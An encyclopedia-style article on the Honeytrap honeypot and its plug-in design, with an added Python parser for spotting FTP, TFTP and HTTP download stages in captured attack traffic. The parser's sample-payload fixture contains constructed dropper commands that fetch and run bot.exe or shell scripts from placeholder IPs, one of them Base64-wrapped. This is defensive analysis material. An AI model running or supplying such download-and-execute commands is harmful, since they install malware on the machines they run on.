Honeytrap (software)

from Wikipedia, the free encyclopedia

Honeytrap is an open source network security tool that uses the low-interaction honeypot principle to log attacks on vulnerabilities. However, Honeytrap does not emulate any known vulnerabilities; instead it examines network traffic, using either a PCAP sniffer, the ip_queue API or netfilter_queue, in order to respond to unknown attacks.

Methodology

After an incoming connection request, a listener is started dynamically for the corresponding port in order to process the requests. This generic behavior allows Honeytrap to respond to most network attacks.

All collected data is analyzed using plug-ins. These are loaded when the program starts, but can also be loaded dynamically at runtime, which allows the honeypot to be extended without interrupting operation. Since some attacks do not continue without a response from the host, a rudimentary catalog of responses was implemented that can be expanded as required.

Incoming connections can be handled in four different modes. In normal mode, a log of the attack is created; in ignore mode Honeytrap remains inactive; proxy mode allows connections to be forwarded; and in mirror mode attacks are reflected back to the attacker. With mirroring, it is no longer necessary to emulate vulnerabilities, since many attackers carry the same vulnerability themselves, so a complete dialogue is established. The behavior can be configured individually for each port. Thanks to its proxy mode, Honeytrap is also suitable as a meta honeypot.

Structure

An attack usually takes place in several stages: after the target has been successfully exploited, data is downloaded from the Internet, which then opens a back door for the attacker. Honeytrap's modular structure follows this process:

  • A framework for storing the attack flow and the collected data for external investigation.
  • A parser for FTP download commands. Downloaded files are saved to disk.
  • A parser for TFTP download commands, with the same goal as for FTP.
  • A parser for HTTP URLs in attacks against vulnerable VNC servers. Here too, the data is downloaded, with the help of wget.
  • Exploits encoded with Base64 are decoded by another plug-in to enable the subsequent analyses.
  • A module to identify new attacks based on heuristics and similarity.
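The following is an added example, not code from the Honeytrap project: a small stand-alone analysis step in the spirit of the FTP, TFTP and HTTP parser plug-ins and the Base64 decoder listed above. It takes a captured payload, unwraps one level of Base64 where a run decodes to printable text, and extracts the host and file of every download instruction it recognizes, so the second-stage download locations can be recorded for investigation. The payloads, address ranges and the `Download`/`extract_downloads` names are all constructed for this example.

```python
"""Extract download instructions (FTP, TFTP, HTTP) from captured attack payloads.

Added example, not Honeytrap project code.  All sample payloads are
constructed and use documentation address ranges (203.0.113.0/24,
198.51.100.0/24).
"""
import base64
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Download:
    protocol: str  # "ftp", "tftp" or "http"
    host: str      # where the second stage is fetched from
    path: str      # file name (ftp/tftp) or the full URL (http)


# Runs of Base64 alphabet long enough to be worth trying to decode.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# "tftp -i HOST GET FILE" (Windows style) or "tftp HOST -c get FILE" (Unix style).
_TFTP = re.compile(
    r"\btftp\s+(?:-i\s+)?(?P<host>[\w.\-]+)\s+(?:-c\s+)?get\s+(?P<file>[^\s;&|]+)",
    re.I)
# Commands of an FTP client script: "open HOST" followed by "get FILE".
_FTP_CMD = re.compile(
    r"\bopen\s+(?P<host>[\w.\-]+)|\b(?:get|mget|recv)\s+(?P<file>[^\s;&|>]+)",
    re.I)
_FTP_HINT = re.compile(r"\bftp\b", re.I)   # does not match inside "tftp"
_URL = re.compile(r"https?://[^\s\"'<>;&|]+", re.I)


def _decode_base64_blobs(text: str) -> list[str]:
    """Return the content of every Base64 run that decodes to printable ASCII."""
    blobs = []
    for run in _B64_RUN.findall(text):
        try:
            plain = base64.b64decode(run, validate=True).decode("ascii")
        except ValueError:  # not Base64, wrong padding, or binary content
            continue
        if plain and all(c.isprintable() or c in "\r\n\t" for c in plain):
            blobs.append(plain)
    return blobs


def extract_downloads(payload: bytes) -> list[Download]:
    """Find FTP, TFTP and HTTP download instructions in one captured payload.

    One level of Base64 is unwrapped first, so "echo <b64> | base64 -d | sh"
    style droppers are seen through.  Results keep first-seen order.
    """
    text = payload.decode("latin-1")  # lossless view of arbitrary bytes
    text = text + "\n" + "\n".join(_decode_base64_blobs(text))
    found: list[Download] = []

    def add(item: Download) -> None:
        if item not in found:
            found.append(item)

    for m in _TFTP.finditer(text):
        add(Download("tftp", m.group("host"), m.group("file")))
    text = _TFTP.sub(" ", text)  # so the TFTP "GET file" is not re-read as FTP

    # FTP scripts: pair each get/mget/recv with the most recent "open HOST".
    if _FTP_HINT.search(text):
        host = None
        for m in _FTP_CMD.finditer(text):
            if m.group("host"):
                host = m.group("host")
            elif host:
                add(Download("ftp", host, m.group("file")))

    for url in _URL.findall(text):
        add(Download("http", urlparse(url).hostname or "", url))
    return found


# Constructed sample payloads, shaped like the download stages the text describes.
SAMPLE_PAYLOADS = {
    "win-ftp-script": (b"cmd /c echo open 203.0.113.7 21>>i&echo user a a>>i"
                       b"&echo binary>>i&echo get bot.exe>>i&echo quit>>i"
                       b"&ftp -n -s:i&bot.exe"),
    "win-tftp": b"cmd /c tftp -i 203.0.113.5 GET bot.exe & start bot.exe",
    "vnc-http": b"\x00\x02\x00\x00wget http://198.51.100.9/vnc.sh -O- | sh",
    "base64-wrapped": (b"echo "
                       + base64.b64encode(b"wget http://203.0.113.9/x.sh -O /tmp/x.sh")
                       + b" | base64 -d | sh"),
}

if __name__ == "__main__":
    for name, payload in SAMPLE_PAYLOADS.items():
        for d in extract_downloads(payload):
            print(f"{name}: {d.protocol} download from {d.host}: {d.path}")
```

The function returns structured records rather than printing, so the same step can feed a storage framework like the one in the first list item; a real plug-in would additionally fetch and store the file, which this example deliberately leaves out.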

Purpose

Honeytrap runs as a daemon and enables, among other things, the collection of malware, viruses and Trojans. These are mainly distributed to build botnets.

By analyzing them, a deeper insight into how they work can be gained, which simplifies the creation of protective measures.

Web links